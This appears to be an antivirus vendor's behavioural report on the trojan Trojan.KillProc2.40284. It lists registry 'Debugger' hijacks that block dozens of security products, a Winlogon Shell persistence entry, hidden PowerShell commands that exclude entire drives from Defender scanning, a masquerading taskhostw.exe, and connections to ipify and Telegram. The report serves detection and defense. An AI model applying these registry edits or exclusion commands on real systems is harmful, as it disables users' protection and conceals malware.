Trojan.KillProc2.40284

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ksde.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klnagent.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgsvc.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgchsvx.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfeavsvc.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcpromgr.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rtvscan.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccsvchst.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster32.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsavp.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sophosclean64.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sophosui.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windefend.exe] 'Debugger' = 'cmd.exe /c exit'
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securityhealthservice.exe] 'Debugger' = 'cmd.exe /c exit'
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "%APPDATA%\Microsoft\Windows\Themes\taskhostw.exe"'

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'A:\' -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\' -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'D:\' -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'E:\' -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Drive name for removable media>:\' -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'taskhostw.exe' -Force"

Terminates or attempts to terminate

the following system processes:

<SYSTEM32>\securityhealthservice.exe

Modifies file system

Creates the following files

%APPDATA%\microsoft\windows\themes\taskhostw.exe
%TEMP%\nebula_telegram_debug.txt

Network activity

Connects to

'ap#.#pify.org':443
'ap#.##legram.org':443

TCP

Other

'ap#.#pify.org':443

UDP

DNS ASK ap#.#pify.org
DNS ASK ap#.##legram.org

Miscellaneous

Creates and executes the following

'%APPDATA%\microsoft\windows\themes\taskhostw.exe'

Executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'A:\' -Force"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\' -Force"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'D:\' -Force"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'E:\' -Force"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Drive name for removable media>:\' -Force"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'taskhostw.exe' -Force"' (with hidden window)